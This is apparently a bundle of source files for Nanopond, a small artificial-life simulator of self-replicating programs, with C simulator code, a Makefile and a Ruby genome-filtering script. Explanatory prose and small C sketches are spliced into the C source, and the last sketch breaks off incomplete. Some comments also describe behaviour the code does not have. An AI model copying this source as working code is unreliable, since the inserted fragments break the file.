maxGeneration,
statCounters.viableCellShares
);
/* The next 16 are the average frequencies of execution for each
* instruction per cell execution. */
double totalMetabolism = 0.0;
for(x=0;x<16;++x) {
totalMetabolism += statCounters.instructionExecutions[x];
printf(",%.4f",(statCounters.cellExecutions > 0.0) ? (statCounters.instructionExecutions[x] / statCounters.cellExecutions) : 0.0);
}
/* The last column is the average metabolism per cell execution */
printf(",%.4f\n",(statCounters.cellExecutions > 0.0) ? (totalMetabolism / statCounters.cellExecutions) : 0.0);
fflush(stdout);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
/* Reset per-report stat counters */
memset((void *)&statCounters,0,sizeof(statCounters));
}
/**
* Dumps all probable viable cells to a file called <clock>.dump
*
* @param clock Clock value
*/
static void doDump(const uint64_t clock)
{
char buf[POND_DEPTH*2];
FILE *d;
struct Cell *pptr;
uintptr_t x,y,i,val;
sprintf(buf,"%llu.dump.csv",clock);
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pptr = &pond[x][y];
fprintf(d,"%llu,%llu,%llu.%llu,",(uint64_t)x,(uint64_t)y,(uint64_t)pptr->ID,(uint64_t)pptr->generation);
val = valence(pptr->genome);
for(i=0;i<POND_DEPTH;++i)
fprintf(d,"%x",genomeAt(pptr->genome,i));
fprintf(d,",");
for(i=0;i<POND_DEPTH;++i)
fprintf(d,"%x",genomeAt(pptr->genome,i) ^ val);
fprintf(d,"\n");
}
}
fclose(d);
}
/**
* Get a neighbor in the pond
*
* @param x Starting X position
* @param y Starting Y position
* @param dir Direction to get neighbor from
* @return Pointer to neighboring cell
*/
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
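The four explicit cases above are equivalent to modular arithmetic on the grid coordinates. A minimal sketch of the same toroidal wrap, using a hypothetical `wrap` helper that is not part of the original source:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper (not in the original source): wrap a grid
 * coordinate into [0, size) the way the pond wraps at its edges.
 * delta is -1, 0, or +1. */
static size_t wrap(long coord, long delta, long size)
{
    /* Adding size before the modulo keeps the dividend non-negative
     * when coord == 0 and delta == -1. */
    return (size_t)((coord + delta + size) % size);
}
```

With this, `getNeighbor(x, y, N_LEFT)` corresponds to `&pond[wrap(x, -1, POND_SIZE_X)][y]`, and likewise for the other three directions. The switch-based version above avoids the division implied by `%`, which matters in the inner loop.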
/**
* Determines if c1 is allowed to access c2
*
* @param c1 First cell attempting access
* @param c2 Cell c1 is attempting to access
* @return True or false (1 or 0)
*/
static inline int accessAllowed(struct Cell *const c1,struct Cell *const c2)
{
if (!isViableReplicator(c2->generation))
return 1;
const uintptr_t l1 = logo(c1->genome);
const uintptr_t l2 = logo(c2->genome);
/* Take the difference larger-minus-smaller: the logos are unsigned,
 * so the other subtraction order would wrap around to a huge value
 * and the comparison below would almost always succeed. */
const uintptr_t diff = (l1 > l2) ? (l1 - l2) : (l2 - l1);
return (getRandom() & 0xf) <= diff;
}
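Since the logos are unsigned four-bit values, an absolute difference has to pick the subtraction order before subtracting; a sketch with a hypothetical helper name:

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: absolute difference of two unsigned 4-bit
 * logos. Subtracting the larger from the smaller would wrap around
 * to a huge value, so choose the subtraction order first. */
static uintptr_t logoDistance(uintptr_t l1, uintptr_t l2)
{
    return (l1 > l2) ? (l1 - l2) : (l2 - l1);
}
```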
/**
* Gets the color that a cell should be
*
* @param c Cell to get color for
* @return 8-bit color value
*/
static inline uint8_t getColor(struct Cell *c)
{
uintptr_t i;
uintptr_t tmp,tmp2,val;
uint8_t color;
if (isViableReplicator(c->generation)) {
switch(colorScheme) {
case CHECKSUM:
/*
* Cells are color coded by genome checksum
*/
val = valence(c->genome);
color = (uint8_t)val;
tmp2 = 0;
for(i=EXEC_START_POSITION;i<POND_DEPTH;++i) {
tmp = genomeAt(c->genome,i) ^ val;
if ((tmp != 0xf)&&(tmp2 != 0xd))
color += (uint8_t)tmp; /* Ignore XCHG operands and STOPs */
tmp2 = tmp;
}
return color;
case LOGO:
/*
* Color code by logo
*
* Black is never used.
*/
return w3cPrimaryColors[logo(c->genome) + 1];
case VALENCE:
/*
* Color code by valence
*
* Black is never used.
*/
return w3cPrimaryColors[valence(c->genome) + 1];
case MAX_COLOR_SCHEME:
/* ... never used... to make compiler shut up. */
break;
}
}
return 0; /* Cells with no energy are black */
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
#ifdef SAVE_BMPS
char tmpbuf[1024];
#endif /* SAVE_BMPS */
uintptr_t i,x,y;
/* Seed and init the random number generator */
init_genrand(time(NULL));
for(i=0;i<1024;++i)
getRandom();
/* Reset per-report stat counters */
memset((void *)&statCounters,0,sizeof(statCounters));
/* Set up SDL if we're using it */
#ifdef USE_SDL
SDL_Surface *screen;
SDL_Event sdlEvent;
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
SDL_WM_SetCaption("nanopond","nanopond");
screen = SDL_SetVideoMode(POND_SIZE_X,POND_SIZE_Y,8,SDL_SWSURFACE);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
const uintptr_t sdlPitch = screen->pitch;
w3cPrimaryColors[0 ] = SDL_MapRGB(screen->format,0x00,0x00,0x00);
w3cPrimaryColors[1 ] = SDL_MapRGB(screen->format,0xb0,0xb0,0xb0);
w3cPrimaryColors[2 ] = SDL_MapRGB(screen->format,0x70,0x70,0x70);
w3cPrimaryColors[3 ] = SDL_MapRGB(screen->format,0xff,0xff,0xff);
w3cPrimaryColors[4 ] = SDL_MapRGB(screen->format,0x80,0x00,0x00);
w3cPrimaryColors[5 ] = SDL_MapRGB(screen->format,0xff,0x00,0x00);
w3cPrimaryColors[6 ] = SDL_MapRGB(screen->format,0x80,0x00,0x80);
w3cPrimaryColors[7 ] = SDL_MapRGB(screen->format,0xff,0x00,0xff);
w3cPrimaryColors[8 ] = SDL_MapRGB(screen->format,0x00,0x80,0x00);
w3cPrimaryColors[9 ] = SDL_MapRGB(screen->format,0x00,0xff,0x00);
w3cPrimaryColors[10] = SDL_MapRGB(screen->format,0x80,0x80,0x00);
w3cPrimaryColors[11] = SDL_MapRGB(screen->format,0xff,0xff,0x00);
w3cPrimaryColors[12] = SDL_MapRGB(screen->format,0x00,0x00,0x80);
w3cPrimaryColors[13] = SDL_MapRGB(screen->format,0x00,0x00,0xff);
w3cPrimaryColors[14] = SDL_MapRGB(screen->format,0x00,0x80,0x80);
w3cPrimaryColors[15] = SDL_MapRGB(screen->format,0x00,0xff,0xff);
w3cPrimaryColors[16] = SDL_MapRGB(screen->format,0x8b,0x45,0x13);
#endif /* USE_SDL */
/* Clear the pond and initialize all genomes
* to 0xffff... */
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pond[x][y].ID = 0ULL;
pond[x][y].generation = 0;
for(i=0;i<16;++i) {
#ifdef POND_ENERGY_VARIATION
pond[x][y].energy[i] = POND_ENERGY_BASE + (getRandom() % POND_ENERGY_VARIATION);
#else
pond[x][y].energy[i] = POND_ENERGY_BASE;
#endif /* POND_ENERGY_VARIATION */
}
for(i=0;i<(POND_DEPTH / INSTRUCTIONS_PER_UINTPTR);++i)
pond[x][y].genome[i] = 0;
}
}
/* Clock is incremented on each core loop */
uint64_t clock = 0ULL;
/* This is used to generate unique cell IDs */
uint64_t cellIdCounter = 1ULL;
/* Miscellaneous variables used in the loop */
uintptr_t ip,inst,tmp,val,correspondingVal;
struct Cell *pptr;
/* Memory pointer register */
uintptr_t ptr;
/* The main "register" */
uintptr_t reg;
/* Which way is the cell facing? */
uintptr_t facing;
/* Neighbors (precalculated at start) */
struct Cell *neighbor[4];
/* Is access allowed to the cell we're facing? This
* is calculated for each possible neighbor. */
uintptr_t facingAllowed[4];
/* Write counts are used to determine when a neighbor
* should be considered a "child." */
uintptr_t neighborWriteCounts[4];
/* Virtual machine loop/rep stack */
uintptr_t loopStack[POND_DEPTH];
uintptr_t loopStackPtr;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
/* If this is nonzero, cell execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Main loop */
for(;;) {
/* Stop at STOP_AT if defined */
#ifdef STOP_AT
if (clock >= STOP_AT) {
/* Also do a final dump if dumps are enabled */
#ifdef DUMP_FREQUENCY
doDump(clock);
#endif /* DUMP_FREQUENCY */
fprintf(stderr,"[QUIT] STOP_AT clock value reached\n");
break;
}
#endif /* STOP_AT */
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
if (!(++clock % REPORT_FREQUENCY)) {
doReport(clock);
/* SDL display is also refreshed every REPORT_FREQUENCY */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
} else if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
break;
case SDL_BUTTON_RIGHT:
colorScheme = (colorScheme + 1) % MAX_COLOR_SCHEME;
fprintf(stderr,"[INTERFACE] Switching to color scheme \"%s\".\n",colorSchemeName[colorScheme]);
for (y=0;y<POND_SIZE_Y;++y) {
for (x=0;x<POND_SIZE_X;++x)
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
}
break;
}
}
}
SDL_UpdateRect(screen,0,0,POND_SIZE_X,POND_SIZE_Y);
#ifdef SAVE_BMPS
sprintf(tmpbuf,"%llu.bmp",clock);
SDL_SaveBMP(screen,tmpbuf);
#endif /* SAVE_BMPS */
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Periodically dump the viable population if defined */
#ifdef DUMP_FREQUENCY
if (!(clock % DUMP_FREQUENCY))
doDump(clock);
#endif /* DUMP_FREQUENCY */
/* Introduce a random cell somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % INFLOW_FREQUENCY)) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
pptr->ID = cellIdCounter++;
pptr->generation = 0;
for(i=0;i<(POND_DEPTH / INSTRUCTIONS_PER_UINTPTR);++i)
pptr->genome[i] = getRandom();
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Pick a random cell to execute */
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
/* Don't execute empty cells */
if (!pptr->ID)
continue;
/* Reset the state of the VM prior to execution */
ptr = 0;
reg = 0;
loopStackPtr = 0;
ip = EXEC_START_POSITION;
facing = 0;
neighbor[0] = getNeighbor(x,y,0);
neighbor[1] = getNeighbor(x,y,1);
neighbor[2] = getNeighbor(x,y,2);
neighbor[3] = getNeighbor(x,y,3);
facingAllowed[0] = accessAllowed(pptr,neighbor[0]);
facingAllowed[1] = accessAllowed(pptr,neighbor[1]);
facingAllowed[2] = accessAllowed(pptr,neighbor[2]);
facingAllowed[3] = accessAllowed(pptr,neighbor[3]);
neighborWriteCounts[0] = 0;
neighborWriteCounts[1] = 0;
neighborWriteCounts[2] = 0;
neighborWriteCounts[3] = 0;
falseLoopDepth = 0;
stop = 0;
/* Get valence of this cell */
val = valence(pptr->genome);
correspondingVal = correspondingValence(val);
/* Keep track of how many cells have been executed */
statCounters.cellExecutions += 1.0;
/* Core execution loop */
while (!stop) {
/* Get next instruction, which is XORed with cell valence */
/* Cell valence determines instruction mapping! */
inst = genomeAt(pptr->genome,ip) ^ val;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
if ((getRandom() & 0xffffffff) < MUTATION_RATE) {
tmp = getRandom(); /* Call getRandom() only once for speed */
if (tmp & 0x1000) /* Check for a high bit to get random boolean */
inst = tmp & INSTRUCTION_MASK;
else reg = tmp & INSTRUCTION_MASK;
}
/* Each instruction processed converts one unit of energy into energy
* of the corresponding valence. */
if (!pptr->energy[val])
break;
else --pptr->energy[val];
++pptr->energy[correspondingVal];
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0xa) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0xb) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
/* Keep track of execution frequencies for each instruction */
statCounters.instructionExecutions[inst] += 1.0;
switch(inst) {
case 0x0: /* ZERO: Zero VM state registers */
reg = 0;
ptr = 0;
facing = 0;
break;
case 0x1: /* FWD: Increment the pointer (wrap at end), set reg==0 on wrap */
if (++ptr >= POND_DEPTH) {
ptr = 0;
reg = 0;
} else reg = 1;
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning), set reg==0 on wrap */
if (ptr) {
--ptr;
reg = 1;
} else {
ptr = POND_DEPTH - 1;
reg = 0;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & INSTRUCTION_MASK;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & INSTRUCTION_MASK;
break;
case 0x5: /* MASK: XOR register with valence */
reg ^= val;
break;
case 0x6: /* READG: Read into the register from genome */
reg = genomeAt(pptr->genome,ptr);
break;
case 0x7: /* WRITEG: Write out from the register to genome */
genomeSet(pptr->genome,ptr,reg);
break;
case 0x8: /* READB: Read into the register from buffer */
if (facingAllowed[facing])
reg = genomeAt(neighbor[facing]->genome,ptr);
else reg = 0;
break;
case 0x9: /* WRITEB: Write out from the register to buffer */
if (facingAllowed[facing]) {
if (++neighborWriteCounts[facing] >= 4) {
/* A neighbor that receives four or more writes is considered an "offspring" */
neighbor[facing]->ID = cellIdCounter++;
neighbor[facing]->generation = pptr->generation + 1;
}
genomeSet(neighbor[facing]->genome,ptr,reg);
}
break;
case 0xa: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else loopStack[loopStackPtr++] = ip;
} else falseLoopDepth = 1;
break;
case 0xb: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
if (reg) {
ip = loopStack[--loopStackPtr];
/* This ensures that the LOOP is rerun */
continue;
} else --loopStackPtr;
}
break;
case 0xc: /* TURN: Turn in the direction specified by register */
facing = reg & 3; /* Four cardinal directions */
break;
case 0xd: /* XCHG: Skip next instruction and exchange value of register with it */
if (++ip < POND_DEPTH) {
tmp = reg;
reg = genomeAt(pptr->genome,ip);
genomeSet(pptr->genome,ip,tmp);
}
break;
case 0xe: /* SHARE: Equalize energy between self and neighbor if allowed */
if (facingAllowed[facing]) {
if (isViableReplicator(neighbor[facing]->generation))
++statCounters.viableCellShares;
tmp = pptr->energy[val] + neighbor[facing]->energy[val];
neighbor[facing]->energy[val] = tmp / 2;
pptr->energy[val] = tmp - neighbor[facing]->energy[val];
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
if (++ip >= POND_DEPTH)
break;
}
/* If the cell runs out of energy of its valence, it "dies." */
if (!pptr->energy[val]) {
pptr->ID = 0ULL;
pptr->generation = 0;
for(i=0;i<(POND_DEPTH / INSTRUCTIONS_PER_UINTPTR);++i)
pptr->genome[i] = 0;
}
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
return 0;
}
<file_sep>all:
	cc -I/usr/local/include -L/usr/local/lib -Ofast -o nanopond nanopond.c -lSDL -lpthread
clean:
rm -rf *.o nanopond *.dSYM
<file_sep>#!/usr/bin/ruby
#
# This script is an extremely pessimistic filter designed to yield
# in binary format a sorted set of all unique, likely to be viable,
# whole genome programs in the substrate.
#
# It is designed to be used in tandem with further compression by a
# program like bzip2 to generate an estimate of the number of unique
# nonredundant bits of viable genome information in the substrate.
#
# Discard genomes for which there are less than this many copies
# These are likely non-viable offspring.
$COUNT_THRESHOLD = 3
# Discard genomes smaller than this, since genomes smaller than this
# simply could not have a functional copy loop.
$SIZE_THRESHOLD = 5
# This hash will contain genomes and how many times they were seen.
specimens = Hash.new
$stdin.each { |csv|
csv.strip!
# CSV file format: ID,parentID,lineage,generation,genome
specimen = csv.split(',')
if specimen.size == 5
    # Column five (index 4) is the actual genome program in hex
genome = specimen[4]
genome.strip!
# Strip the first character since that's the "logo" and is not an
# instruction.
genome.gsub!(/^./,'')
# Strip the argument of the XCHG instruction since that is not
# technically an instruction.
genome.gsub!(/c./,'c')
# Strip anything after the first STOP instruction to include only
# instructions that are *definitely* functional.
genome.gsub!(/f.*/,'')
# Count how many instances of the given genome pattern there are
# using this hash.
genome.freeze
specimens[genome] = specimens[genome].to_i + 1
end
}
# Delete genome strings for which there are less than the
# count threshold copies or which are too small.
specimens.delete_if { |genome,cnt| ((cnt < $COUNT_THRESHOLD) or (genome.length < $SIZE_THRESHOLD)) }
# Get a sorted array of all genome strings
genomes = specimens.keys
genomes.sort!
# Remove genome strings that are substrings of other ones (probably
# abortive reproduction attempts). This leaves only unique genomes
# that appear to be "whole specimens."
wholeGenomes = Array.new
genomes.each { |g|
whole = true
genomes.each { |g2|
# It's not a "whole genome" if it's a substring of another and
# is shorter than that one.
if ((not g2.index(g).nil?) and (g.length < g2.length))
whole = false
break
end
}
wholeGenomes << g if whole
}
genomes = wholeGenomes
# Sanity check
exit unless genomes.size > 0
# Concatenate it all together into one big hexadecimal string
allGenomes = String.new
genomes.each { |genome|
allGenomes << genome
}
# Output each pair of four-bit words as a single eight-bit byte
tmp = String.new
allGenomes.split(//).each { |b|
tmp << b
if tmp.length == 2
$stdout.putc(tmp.to_i(16))
tmp.chop!
tmp.chop!
end
}
# Output the last four bits if there is an odd number of four-bit words.
if tmp.length == 1
$stdout.putc(tmp.to_i(16))
end
<file_sep>/* *********************************************************************** */
/* */
/* Nanopond version 1.1 -- A teeny tiny artificial life virtual machine */
/* Copyright (C) 2005 <NAME> - http://www.greythumb.org/people/api */
/* Copyright (C) 2005 <NAME> - http://falma.de/ */
/* */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or */
/* (at your option) any later version. */
/* */
/* This program is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with this program; if not, write to the Free Software */
/* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 USA */
/* */
/* *********************************************************************** */
/*
Changes in 1.1:
* Changed EAT to SHARE.
* Different color schemes (switch with right mouse button)
* Dumping of genomes of single cells to stderr (press left mouse button)
* Random number generator called only once per command
* Replaced INFLOW_RATE_MEAN and INFLOW_RATE_DEVIATION by INFLOW_RATE_BASE
and INFLOW_RATE_VARIATION. Same effect but a little bit faster.
*/
/*
* Nanopond is just what it says: a very very small and simple artificial
* life virtual machine.
*
* It is a "small evolving program" based artificial life system of the same
* general class as Tierra, Avida, and Archis. It is written in very tight
* and efficient C code to make it as fast as possible, and is so small that
* it consists of only one .c file.
*
* How Nanopond works:
*
* The Nanopond world is called a "pond." It is an NxN two dimensional
* array of Cell structures, and it wraps at the edges (it's toroidal).
* Each Cell structure consists of a few attributes that are there for
* statistics purposes, an energy level, and an array of POND_DEPTH
* four-bit values. (The four-bit values are actually stored in an array
* of machine-size words.) The array in each cell contains the genome
* associated with that cell, and POND_DEPTH is therefore the maximum
* allowable size for a cell genome.
*
* The first four bit value in the genome is called the "logo." What that is
* for will be explained later. The remaining four bit values each code for
* one of 16 instructions. Instruction zero (0x0) is NOP (no operation) and
* instruction 15 (0xf) is STOP (stop cell execution). Read the code to see
* what the others are. The instructions are exceptionless and lack fragile
* operands. This means that *any* arbitrary sequence of instructions will
* always run and will always do *something*. This is called an evolvable
* instruction set, because programs coded in an instruction set with these
* basic characteristics can mutate. The instruction set is also
* Turing-complete, which means that it can theoretically do anything any
 * computer can do. If you're curious, the instruction set is based on this:
* http://www.muppetlabs.com/~breadbox/bf/
*
* At the center of Nanopond is a core loop. Each time this loop executes,
* a clock counter is incremented and one or more things happen:
*
 * - Every REPORT_FREQUENCY clock ticks a line of comma separated output
* is printed to STDOUT with some statistics about what's going on.
* - Every DUMP_FREQUENCY clock ticks, all viable replicators (cells whose
 * generation is > 2) are dumped to a file on disk.
* - Every INFLOW_FREQUENCY clock ticks a random x,y location is picked,
* energy is added (see INFLOW_RATE_BASE and INFLOW_RATE_VARIATION)
 * and its genome is filled with completely random bits. Statistics
* are also reset to generation==0 and parentID==0 and a new cell ID
* is assigned.
* - Every tick a random x,y location is picked and the genome inside is
* executed until a STOP instruction is encountered or the cell's
* energy counter reaches zero. (Each instruction costs one unit energy.)
*
* The cell virtual machine is an extremely simple register machine with
* a single four bit register, one memory pointer, one spare memory pointer
* that can be exchanged with the main one, and an output buffer. When
* cell execution starts, this output buffer is filled with all binary 1's
* (0xffff....). When cell execution is finished, if the first byte of
* this buffer is *not* 0xff, then the VM says "hey, it must have some
* data!". This data is a candidate offspring; to reproduce cells must
* copy their genome data into the output buffer.
*
* When the VM sees data in the output buffer, it looks at the cell
* adjacent to the cell that just executed and checks whether or not
* the cell has permission (see below) to modify it. If so, then the
* contents of the output buffer replace the genome data in the
* adjacent cell. Statistics are also updated: parentID is set to the
* ID of the cell that generated the output and generation is set to
* one plus the generation of the parent.
*
* A cell is permitted to access a neighboring cell if:
* - That cell's energy is zero
* - That cell's parentID is zero
* - That cell's logo (remember?) matches the trying cell's "guess"
*
* Since randomly introduced cells have a parentID of zero, this allows
* real living cells to always replace them or share energy with them.
*
* The "guess" is merely the value of the register at the time that the
* access attempt occurs.
*
* Permissions determine whether or not an offspring can take the place
* of the contents of a cell and also whether or not the cell is allowed
 * to SHARE (an instruction) energy with its neighbor.
*
* If you haven't realized it yet, this is why the final permission
* criteria is comparison against what is called a "guess." In conjunction
* with the ability to "share" neighbors' energy, guess what this permits?
*
* Since this is an evolving system, there have to be mutations. The
* MUTATION_RATE sets their probability. Mutations are random variations
* with a frequency defined by the mutation rate to the state of the
* virtual machine while cell genomes are executing. Since cells have
* to actually make copies of themselves to replicate, this means that
* these copies can vary if mutations have occurred to the state of the
* VM while copying was in progress.
*
* What results from this simple set of rules is an evolutionary game of
* "corewar." In the beginning, the process of randomly generating cells
* will cause self-replicating viable cells to spontaneously emerge. This
* is something I call "random genesis," and happens when some of the
* random gak turns out to be a program able to copy itself. After this,
* evolution by natural selection takes over. Since natural selection is
* most certainly *not* random, things will start to get more and more
* ordered and complex (in the functional sense). There are two commodities
* that are scarce in the pond: space in the NxN grid and energy. Evolving
* cells compete for access to both.
*
* If you want more implementation details such as the actual instruction
* set, read the source. It's well commented and is not that hard to
 * read. Most of its complexity comes from the fact that four-bit values
* are packed into machine size words by bit shifting. Once you get that,
* the rest is pretty simple.
*
 * Nanopond, for all its simplicity, manifests some really interesting
* evolutionary dynamics. While I haven't run the kind of multiple-
* month-long experiment necessary to really see this (I might!), it
* would appear that evolution in the pond doesn't get "stuck" on just
* one or a few forms the way some other simulators are apt to do.
 * I think simplicity is partly responsible for this along with what
* biologists call embeddedness, which means that the cells are a part
* of their own world.
*
* Run it for a while... the results can be... interesting!
*
* Running Nanopond:
*
* Nanopond can use SDL (Simple Directmedia Layer) for screen output. If
* you don't have SDL, comment out USE_SDL below and you'll just see text
* statistics and get genome data dumps. (Turning off SDL will also speed
* things up slightly.)
*
* After looking over the tunable parameters below, compile Nanopond and
* run it. Here are some example compilation commands from Linux:
*
* For Pentiums:
* gcc -O6 -march=pentium -funroll-loops -fomit-frame-pointer -s
* -o nanopond nanopond.c -lSDL
*
* For Athlons with gcc 4.0+:
* gcc -O6 -msse -mmmx -march=athlon -mtune=athlon -ftree-vectorize
* -funroll-loops -fomit-frame-pointer -o nanopond nanopond.c -lSDL
*
* The second line is for gcc 4.0 or newer and makes use of GCC's new
* tree vectorizing feature. This will speed things up a bit by
* compiling a few of the loops into MMX/SSE instructions.
*
* This should also work on other Posix-compliant OSes with relatively
* new C compilers. (Really old C compilers will probably not work.)
* On other platforms, you're on your own! On Windows, you will probably
* need to find and download SDL if you want pretty graphics and you
* will need a compiler. MinGW and Borland's BCC32 are both free. I
* would actually expect those to work better than Microsoft's compilers,
* since MS tends to ignore C/C++ standards. If stdint.h isn't around,
* you can fudge it like this:
*
* #define uintptr_t unsigned long (or whatever your machine size word is)
* #define uint8_t unsigned char
* #define uint64_t unsigned long long (or whatever is a 64-bit int)
*
 * When Nanopond runs, comma-separated stats (see doReport() for
* the columns) are output to stdout and various messages are output
* to stderr. For example, you might do:
*
* ./nanopond >>stats.csv 2>messages.txt &
*
 * To get both in separate files.
*
* Have fun!
*/
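The "hey, it must have some data!" check described above boils down to testing the first byte of the output buffer against 0xff. A minimal sketch (the function name is hypothetical; the original inlines this test):

```c
#include <assert.h>
#include <stdint.h>

/* The output buffer starts out filled with all binary 1s (0xffff...),
 * so a write to its beginning is detectable: data is considered
 * present iff the first byte is no longer 0xff. */
static int outputBufferHasData(const uintptr_t *outputBuf)
{
    return (outputBuf[0] & 0xff) != 0xff;
}
```

A genome that never copies anything into the buffer therefore produces no offspring, since the buffer still looks "empty" when execution ends.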
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* If this is defined, one is dropped occasionally into the world */
/* This is only for debugging, and makes things less interesting.
* You should probably leave it undefined. */
/* #define SYNTHETIC_REPLICATOR 1 */
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. The default of 250000 is good on a 2ghz Athlon.
* This is also the frequency of screen refreshes if SDL is enabled. */
#define REPORT_FREQUENCY 500000
/* Frequency at which to dump all viable replicators (generation > 2)
* to a file named <clock>.dump in the current directory. Comment
* out to disable. The cells are dumped in hexadecimal, which is
* semi-human-readable if you look at the big switch() statement
* in the main loop to see what instruction is signified by each
* four-bit value. */
#define DUMP_FREQUENCY 100000000
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
// #define MUTATION_RATE 42949 /* p=~0.00001 */
#define MUTATION_RATE 128849*10 /* p=~0.0003 */
/* #define MUTATION_RATE 429496 /\* p=~0.0001 *\/ */
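The probability-to-rate conversion described above (multiply by 0xffffffff and round) can be sketched as follows; the helper name is hypothetical:

```c
#include <assert.h>
#include <stdint.h>

/* Convert a mutation probability in [0.0, 1.0] to the 32-bit integer
 * rate that gets compared against (getRandom() & 0xffffffff).
 * Adding 0.5 before truncation rounds to nearest. */
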